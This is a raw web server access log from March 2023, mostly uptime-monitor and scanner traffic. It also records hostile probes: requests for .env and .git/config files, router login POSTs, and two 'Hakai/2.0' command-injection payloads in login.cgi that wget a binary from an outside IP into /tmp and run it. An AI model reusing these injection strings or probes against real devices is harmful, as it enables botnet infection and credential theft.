69.162.243.124 - - [03/Mar/2023:19:10:01 +0100] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [03/Mar/2023:19:10:02 +0100] "POST /apps HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:10:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.157.23.94 - - [03/Mar/2023:19:10:18 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [03/Mar/2023:19:10:19 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.130 - - [03/Mar/2023:19:10:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:19:11:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:12:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:13:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:14:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:15:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:15:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:16:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:17:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:17:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.139.249 - - [03/Mar/2023:19:17:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:18:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:18:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:20:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:20:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.139.249 - - [03/Mar/2023:19:20:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.139.249 - - [03/Mar/2023:19:20:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.246.220.98 - - [03/Mar/2023:19:21:00 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Mar/2023:19:21:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:22:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:22:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:23:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:23:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:24:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:24:05 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.139.249 - - [03/Mar/2023:19:24:08 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:19:25:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:26:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [03/Mar/2023:19:26:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:19:27:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:28:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:29:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:30:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.159.160.225 - - [03/Mar/2023:19:30:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.246.220.98 - - [03/Mar/2023:19:30:45 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.32.162.159 - - [03/Mar/2023:19:30:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:19:31:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:32:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:33:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:34:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.253.74.116 - - [03/Mar/2023:19:34:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:35:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:36:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:37:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:38:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.156 - - [03/Mar/2023:19:38:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:19:38:57 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [03/Mar/2023:19:39:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:40:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:41:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:42:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.66.118.90 - - [03/Mar/2023:19:42:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
67.183.136.106 - - [03/Mar/2023:19:42:33 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [03/Mar/2023:19:42:34 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:43:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:44:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:45:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.212.227.117 - - [03/Mar/2023:19:45:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:46:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:47:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:49:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.56.29.190 - - [03/Mar/2023:19:49:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.56.29.190 - - [03/Mar/2023:19:49:42 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [03/Mar/2023:19:50:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:51:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:52:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:19:52:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:19:53:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.85.173.196 - - [03/Mar/2023:19:53:14 +0100] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [03/Mar/2023:19:53:14 +0100] "POST /admin HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:54:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:55:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:19:55:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:19:55:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.139.249 - - [03/Mar/2023:19:55:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.10.139.249 - - [03/Mar/2023:19:55:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:19:56:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.59 - - [03/Mar/2023:19:57:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [03/Mar/2023:19:57:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [03/Mar/2023:19:57:04 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [03/Mar/2023:19:57:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2023:19:57:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:19:57:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.233.97.233 - - [03/Mar/2023:19:57:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Mar/2023:19:58:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:59:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:00:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:00:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:20:01:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [03/Mar/2023:20:01:05 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Mar/2023:20:02:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:03:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:03:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
130.211.54.158 - - [03/Mar/2023:20:03:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
130.211.54.158 - - [03/Mar/2023:20:03:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
198.235.24.182 - - [03/Mar/2023:20:03:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Mar/2023:20:04:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:04:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:20:05:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:06:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:07:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:07:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:20:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:09:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.159.111.175 - - [03/Mar/2023:20:09:06 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
3.10.139.249 - - [03/Mar/2023:20:09:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:20:10:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.187.205.166 - - [03/Mar/2023:20:10:43 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Mar/2023:20:11:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [03/Mar/2023:20:11:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:20:12:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:12:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.246.220.98 - - [03/Mar/2023:20:12:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:20:13:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:13:12 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:14:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.16.142.230 - - [03/Mar/2023:20:14:17 +0100] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:20:14:17 +0100] "POST /apps HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:20:15:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:17:03 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:17:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:18:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:18:48 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:20:19:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.139.249 - - [03/Mar/2023:20:19:21 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:20:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:21:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:21:06 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:22:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:20:22:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:20:23:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.139.249 - - [03/Mar/2023:20:23:57 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [03/Mar/2023:20:24:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:25:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:26:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.110.62.172 - - [03/Mar/2023:20:26:16 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"
65.141.6.170 - - [03/Mar/2023:20:26:31 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [03/Mar/2023:20:26:32 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:20:27:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:28:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:29:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:30:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //admin/.git/config HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //wallet/.git/config HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //api/.git/config HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //laravel/.git/config HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
